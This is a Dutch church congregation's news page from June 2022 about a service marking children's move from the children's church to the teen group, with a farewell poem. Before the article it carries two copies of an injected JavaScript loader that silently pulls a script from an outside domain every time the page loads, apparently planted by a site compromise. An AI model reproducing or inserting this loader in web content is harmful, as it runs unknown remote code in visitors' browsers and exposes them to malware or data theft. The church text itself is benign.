;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Overstappen! - PKN Damwâld

Overstappen!

Gepubliceerd op: maandag 20 juni 2022

Toegegeven … het was zomers warm buiten, maar bij het uitblijven van de juiste antwoorden leken de toenemende stiltes ongemakkelijker aan te voelen dan het aantal graden op de thermometer. Taaie quizvragen vlogen over de hoofden van de aanwezige bezoekers in de kerkbank: “Ik geef mensen een tweede kans  – ik was eerst een visser, maar doe nog steeds iets met water – Als mensen vragen wie ik ben, dan ben ik de stem uit de roepende in de woestijn”. Even later in de dienst namen de twaalfjarige quizmasters afscheid van de kindernevendienst.

Voor Aukje, Dylano, Wytze, Rick, Imke, Arjan, Arijan, Jente en Anna was er aan het eind van het schooljaar een bijzondere viering, waarin we samen met hen stilstonden bij het overgangsmoment tussen basisschool en middelbare school waar ze na de zomervakantie naar toe gaan. Deze jongeren namen afgelopen zondag in een speciale ‘overstapdienst’ afscheid van de kindernevendienst en maakten op zeer ludieke wijze de overstap naar de tienergroep. Alle jongeren kregen uit handen van de leiding een persoonlijke Bijbel aangeboden. Bovenal kregen ze de zegen van de Here God mee en uiteraard werd er voor hen gebeden.

Het is zover
Daar sta je dan
Klaar om uit te vliegen
De wereld aan je voeten
Kansen voor het grijpen
Mensen te ontmoeten

En of je links- of rechtsaf slaat
Fladdert, vliegt of graag wil dansen
Volg de weg die bij je past
Creëer je eigen mooie kansen

Want jij bent jij
Met jouw talent
Ik heb gezien hoe mooi jij bent
Je bent uniek en heel speciaal
Een prachtig kind
Met een verhaal

Jij hebt de wereld iets te geven
Laat je zien
Groei en ontdek
Geniet zonder mate van het leven

Ik laat je los
Ik laat je gaan
Ik geloof en vertrouw
Dat jij je weg gaat vinden
Echt
Ik geloof in jou!